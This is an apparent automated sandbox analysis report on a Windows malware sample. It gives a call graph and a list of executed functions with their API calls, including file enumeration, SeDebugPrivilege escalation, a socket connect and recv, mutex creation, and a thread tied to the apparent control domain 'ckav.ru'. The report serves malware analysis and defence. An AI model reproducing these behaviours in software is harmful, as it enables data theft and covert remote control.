40e8df 9251 412093 20 API calls 9250->9251 9252 40e8f8 9251->9252 9253 412093 20 API calls 9252->9253 9254 40e908 9253->9254 9261 404b22 9254->9261 9256 40e91c 9257 40e936 9256->9257 9260 40e93d 9256->9260 9268 40e944 9256->9268 9259 402bab 2 API calls 9257->9259 9259->9260 9262 402b7c 2 API calls 9261->9262 9263 404b33 9262->9263 9267 404b66 9263->9267 9277 4049b3 9263->9277 9266 402bab 2 API calls 9266->9267 9267->9256 9269 4056bf 2 API calls 9268->9269 9270 40e952 9269->9270 9271 4057df 13 API calls 9270->9271 9276 40e976 9270->9276 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9276 9276->9257 9278 4031e5 4 API calls 9277->9278 9279 4049c6 9278->9279 9279->9266 9279->9267 9280 4139de 9289 413855 9280->9289 9282 4139f1 9283 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9282->9283 9288 4139f7 9283->9288 9284 413866 58 API calls 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9288->9284 9290 4031e5 4 API calls 9289->9290 9291 413864 9290->9291 9291->9291 9916 4116e7 9917 4117ba 9916->9917 9918 4117f1 9917->9918 9919 405b6f 6 API calls 9917->9919 9920 4117d0 9919->9920 9920->9918 9921 404cbf 8 API calls 9920->9921 9922 4117eb 9921->9922 9923 402bab 2 API calls 9922->9923 9923->9918 9311 4094e7 9312 404b22 6 API calls 9311->9312 9313 4094fe 9312->9313 9314 409554 9313->9314 9315 405b6f 6 API calls 9313->9315 9316 409514 9315->9316 9317 404b22 6 API calls 9316->9317 9323 40954d 9316->9323 9319 40952d 9317->9319 9318 402bab 2 API calls 9318->9314 9320 409408 15 API calls 9319->9320 9325 409544 9319->9325 9322 40953e 9320->9322 9321 402bab 2 API calls 9321->9323 9324 402bab 2 API calls 9322->9324 9323->9318 9324->9325 9325->9321 9334 4058ea 9335 4031e5 4 API calls 9334->9335 9336 4058fd StrStrA 9335->9336 9968 40d4ea 9969 404bee 6 API calls 9968->9969 9970 40d500 9969->9970 9971 40d5a0 9970->9971 9972 404bee 6 API calls 9970->9972 9973 40d529 9972->9973 9974 404bee 6 API calls 9973->9974 9975 40d537 9974->9975 9976 404bee 6 API calls 9975->9976 9977 40d546 9976->9977 9977->9971 9978 405872 4 API calls 9977->9978 9979 40d56d 9978->9979 9980 405872 4 API calls 9979->9980 9981 40d57c 9980->9981 9982 405872 4 API calls 9981->9982 9983 40d58e 9982->9983 9984 405872 4 API calls 9983->9984 9984->9971 9985 40a3ea 9986 40374e 6 API calls 9985->9986 9987 40a403 9986->9987 9988 40a419 9987->9988 9989 4059d8 4 API calls 9987->9989 9990 40a411 9989->9990 9991 402bab 2 API calls 9990->9991 9991->9988 9374 404df3 WSAStartup 9378 4091f6 9379 404b22 6 API calls 9378->9379 9380 40920b 9379->9380 9381 409222 9380->9381 9382 409408 15 API calls 9380->9382 9383 40921c 9382->9383 9384 402bab 2 API calls 9383->9384 9384->9381 10018 4117fe 10019 404c4e 6 API calls 10018->10019 10020 411888 10019->10020 10021 404c4e 6 API calls 10020->10021 10023 411925 10020->10023 10022 4118ab 10021->10022 10022->10023 10037 4119b3 10022->10037 10025 4118c5 10026 4119b3 4 API calls 10025->10026 10027 4118d0 10026->10027 10027->10023 10028 4056bf 2 API calls 10027->10028 10029 4118fd 10028->10029 10030 405872 4 API calls 10029->10030 10031 41190a 10030->10031 10032 405872 4 API calls 10031->10032 10033 411915 10032->10033 10034 413aca 4 API calls 10033->10034 10035 41191f 10034->10035 10036 405695 2 API calls 10035->10036 10036->10023 10038 4119c6 10037->10038 10039 4119bf 10037->10039 10040 4031e5 4 API calls 10038->10040 10039->10025 10040->10039 9388 40e880 9389 41219c 14 API calls 9388->9389 9390 40e88e 9389->9390 9391 41219c 14 API calls 9390->9391 9392 40e89c 9391->9392 10104 40e48a 10105 404bee 6 API calls 10104->10105 10106 40e4d0 10105->10106 10107 40e4f4 10106->10107 10108 405872 4 API calls 10106->10108 10108->10107 9489 410390 9490 404b22 6 API calls 9489->9490 9491 4103a5 9490->9491 9492 410409 9491->9492 9493 405b6f 6 API calls 9491->9493 9496 4103ba 9493->9496 9494 410402 9495 402bab 2 API calls 9494->9495 9495->9492 9496->9494 9498 403d74 19 API calls 9496->9498 9501 4103fb 9496->9501 9497 402bab 2 API calls 9497->9494 9499 4103ee 9498->9499 9500 402bab 2 API calls 9499->9500 9499->9501 9500->9501 9501->9497 10119 40ed96 10120 4040bb 12 API calls 10119->10120 10134 40edb0 10120->10134 10121 40ef90 10122 40ef87 10123 403f9e 5 API calls 10122->10123 10123->10121 10124 405ae9 6 API calls 10124->10134 10125 412269 6 API calls 10125->10134 10126 40ef61 10129 40ef6e 10126->10129 10130 402bab 2 API calls 10126->10130 10127 402bab GetProcessHeap HeapFree 10127->10134 10128 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10128->10134 10131 40ef7c 10129->10131 10132 402bab 2 API calls 10129->10132 10130->10129 10131->10122 10133 402bab 2 API calls 10131->10133 10132->10131 10133->10122 10134->10121 10134->10122 10134->10124 10134->10125 10134->10126 10134->10127 10134->10128 10135 40ef98 10136 404c4e 6 API calls 10135->10136 10137 40efb6 10136->10137 10138 40f02a 10137->10138 10150 40f054 10137->10150 10141 404bee 6 API calls 10142 40efda 10141->10142 10143 404bee 6 API calls 10142->10143 10144 40efe9 10143->10144 10144->10138 10145 405872 4 API calls 10144->10145 10146 40f008 10145->10146 10147 405872 4 API calls 10146->10147 10148 40f01a 10147->10148 10149 405872 4 API calls 10148->10149 10149->10138 10151 40f064 10150->10151 10152 402b7c 2 API calls 10151->10152 10154 40f072 10152->10154 10153 40efca 10153->10141 10154->10153 10156 405ecd 10154->10156 10157 4059b8 4 API calls 10156->10157 10158 405edf 10157->10158 10158->10154 9508 410c98 9509 41219c 14 API calls 9508->9509 9510 410ca8 9509->9510 9511 41219c 14 API calls 9510->9511 9512 410cb5 9511->9512 9513 412093 20 API calls 9512->9513 9514 410cc9 9513->9514 10228 41249c 10229 4056bf 2 API calls 10228->10229 10230 4124aa 10229->10230 10231 4057df 13 API calls 10230->10231 10236 4124ce 10230->10236 10232 4124be 10231->10232 10233 413aca 4 API calls 10232->10233 10234 4124c8 10233->10234 10235 405695 2 API calls 10234->10235 10235->10236 9518 40f49e 9519 40f4b6 13 API calls 9518->9519 9520 40f4a8 9519->9520 9521 40929e 9522 413b28 6 API calls 9521->9522 9523 4092a4 9522->9523 9524 405b6f 6 API calls 9523->9524 9525 4092af 9524->9525 9526 4092c5 9525->9526 9527 409408 15 API calls 9525->9527 9528 4092bf 9527->9528 9529 402bab 2 API calls 9528->9529 9529->9526 10255 407fa4 10256 407fb7 10255->10256 10257 402b7c 2 API calls 10256->10257 10259 407fee 10256->10259 10258 40800d 10257->10258 10258->10259 10260 4037be 4 API calls 10258->10260 10261 40803c 10260->10261 10262 402bab 2 API calls 10261->10262 10262->10259 9566 4090aa 9567 404b22 6 API calls 9566->9567 9568 4090c1 9567->9568 9569 4090d8 9568->9569 9570 409408 15 API calls 9568->9570 9571 404b22 6 API calls 9569->9571 9572 4090d2 9570->9572 9573 4090eb 9571->9573 9574 402bab 2 API calls 9572->9574 9575 408c4d 15 API calls 9573->9575 9578 409104 9573->9578 9574->9569 9576 4090fe 9575->9576 9577 402bab 2 API calls 9576->9577 9577->9578 9585 409cae 9600 404b79 9585->9600 9587 409cc5 9588 409d27 9587->9588 9590 405b6f 6 API calls 9587->9590 9591 409d2f 9587->9591 9589 402bab 2 API calls 9588->9589 9589->9591 9592 409cec 9590->9592 9592->9588 9593 404b79 6 API calls 9592->9593 9594 409d05 9593->9594 9595 409d1e 9594->9595 9596 408c4d 15 API calls 9594->9596 9597 402bab 2 API calls 9595->9597 9598 409d18 9596->9598 9597->9588 9599 402bab 2 API calls 9598->9599 9599->9595 9601 404b22 6 API calls 9600->9601 9602 404b8a 9601->9602 9602->9587 10322 411fb3 10323 405b6f 6 API calls 10322->10323 10325 412013 10323->10325 10324 412075 10325->10324 10340 41206a 10325->10340 10341 411a8d 10325->10341 10327 402bab 2 API calls 10327->10324 10329 4056bf 2 API calls 10330 41203d 10329->10330 10331 405872 4 API calls 10330->10331 10332 41204a 10331->10332 10333 413aca 4 API calls 10332->10333 10334 412054 10333->10334 10335 405695 2 API calls 10334->10335 10336 41205a 10335->10336 10337 413a58 13 API calls 10336->10337 10338 412064 10337->10338 10339 402bab 2 API calls 10338->10339 10339->10340 10340->10327 10342 402b7c 2 API calls 10341->10342 10343 411aa3 10342->10343 10351 411f05 10343->10351 10364 404ada 10343->10364 10346 404ada 4 API calls 10347 411cad 10346->10347 10348 411f0c 10347->10348 10349 411cc0 10347->10349 10350 402bab 2 API calls 10348->10350 10367 405eb6 10349->10367 10350->10351 10351->10329 10351->10340 10353 411d3c 10354 4031e5 4 API calls 10353->10354 10362 411d7b 10354->10362 10355 411ea6 10356 4031e5 4 API calls 10355->10356 10357 411eb5 10356->10357 10358 4031e5 4 API calls 10357->10358 10359 411ed6 10358->10359 10360 405eb6 4 API calls 10359->10360 10360->10351 10361 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10361->10362 10362->10355 10362->10361 10363 405eb6 4 API calls 10362->10363 10363->10362 10365 4031e5 4 API calls 10364->10365 10366 404afd 10365->10366 10366->10346 10368 405998 4 API calls 10367->10368 10369 405ec8 10368->10369 10369->10353 9632 40f6b8 9633 41219c 14 API calls 9632->9633 9634 40f6c7 9633->9634 9635 41219c 14 API calls 9634->9635 9636 40f6d5 9635->9636 9637 41219c 14 API calls 9636->9637 9638 40f6df 9637->9638 9657 40d6bd 9658 4056bf 2 API calls 9657->9658 9659 40d6c9 9658->9659 9670 404cbf 9659->9670 9662 404cbf 8 API calls 9663 40d6f4 9662->9663 9664 404cbf 8 API calls 9663->9664 9665 40d702 9664->9665 9666 413aca 4 API calls 9665->9666 9667 40d711 9666->9667 9668 405695 2 API calls 9667->9668 9669 40d71f 9668->9669 9671 402b7c 2 API calls 9670->9671 9672 404ccd 9671->9672 9673 404ddc 9672->9673 9674 404b8f 5 API calls 9672->9674 9673->9662 9675 404ce4 9674->9675 9676 404dd4 9675->9676 9678 402b7c 2 API calls 9675->9678 9677 402bab 2 API calls 9676->9677 9677->9673 9685 404d04 9678->9685 9679 404dcc 9680 404a39 5 API calls 9679->9680 9680->9676 9681 404dc6 9682 402bab 2 API calls 9681->9682 9682->9679 9683 402b7c 2 API calls 9683->9685 9684 404b8f 5 API calls 9684->9685 9685->9679 9685->9681 9685->9683 9685->9684 9686 404a39 5 API calls 9685->9686 9687 405b6f 6 API calls 9685->9687 9688 404cbf 8 API calls 9685->9688 9689 402bab GetProcessHeap HeapFree 9685->9689 9686->9685 9687->9685 9688->9685 9689->9685 9690 40f0bf 9691 4056bf 2 API calls 9690->9691 9692 40f0c9 9691->9692 9694 404cbf 8 API calls 9692->9694 9702 40f115 9692->9702 9693 41219c 14 API calls 9695 40f128 9693->9695 9696 40f0ed 9694->9696 9697 404cbf 8 API calls 9696->9697 9698 40f0fb 9697->9698 9699 413aca 4 API calls 9698->9699 9700 40f10a 9699->9700 9701 405695 2 API calls 9700->9701 9701->9702 9702->9693

                          Executed Functions

                          Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 154 403f97-403f9d 152->154 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 189 403e30-403e4c call 405b6f 172->189 190 403e24-403e2e 172->190 173->166 186 403dfb-403e10 call 405eff 173->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->172 189->166 203 403e4e-403e6f call 403d74 call 402bab 189->203 190->166 190->189 193->162 205 403f8d 196->205 197->159 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 205->160 209->181 217->154
                          APIs
                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFind$FirstNext
                          • String ID: %s\%s$%s\*$Program Files$Windows
                          • API String ID: 1690352074-2009209621
                          • Opcode ID: 37f6e0de98243db13940183a6d740f716220b5c39bd862cb24faecfac080353b
                          • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                          • Opcode Fuzzy Hash: 37f6e0de98243db13940183a6d740f716220b5c39bd862cb24faecfac080353b
                          • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                          • String ID: SeDebugPrivilege
                          • API String ID: 3615134276-2896544425
                          • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                          • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                          • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                          • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                          • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID:
                          • API String ID: 1357844191-0
                          • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                          • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                          Download Yara Rule
                          APIs
                          • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: recv
                          • String ID:
                          • API String ID: 1507349165-0
                          • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                          • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                          • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                          • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 231->235 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 259 406311-406317 call 402bab 257->259 260 406318-40631e 257->260 259->260 265 406320-406326 call 402bab 260->265 266 406327 260->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062e4 call 4031e5 262->273 263->257 265->266 266->235 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                          APIs
                          • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                          • _wmemset.LIBCMT ref: 00406244
                          • _wmemset.LIBCMT ref: 00406261
                          • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wmemset$ErrorInformationLastToken
                          • String ID: IDA$IDA
                          • API String ID: 487585393-2020647798
                          • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                          • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                          • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                          • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 553 404ec7-404ec9 542->553 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 547 404ec0-404ec6 call 402bab 545->547 548 404ecb 545->548 546->545 547->553 552 404ecd-404ece 548->552 552->539 553->552
                          APIs
                          • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                          • socket.WS2_32(?,?,?), ref: 00404E7A
                          • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: freeaddrinfogetaddrinfosocket
                          • String ID:
                          • API String ID: 2479546573-0
                          • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                          • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                          • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                          • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                          • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$AllocCreateReadVirtual
                          • String ID: .tmp
                          • API String ID: 3585551309-2986845003
                          • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                          • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                          • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                          • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                          • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                          • GetLastError.KERNEL32 ref: 0041399E
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$CreateLastModeMutex
                          • String ID:
                          • API String ID: 3448925889-0
                          • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                          • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                          • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                          • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                          • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CreatePointerWrite
                          • String ID:
                          • API String ID: 3672724799-0
                          • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                          • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                          • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                          • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                            • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                            • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                            • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_SecuriteInfo.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$CreateFreeProcessThread_wmemset
                          • String ID: ckav.ru
                          • API String ID: 2915393847-2696028687
                          • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                          • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                          • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                          • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • _wmemset.LIBCMT ref: 0040634F
                          Strings
                          Memory Dump Source
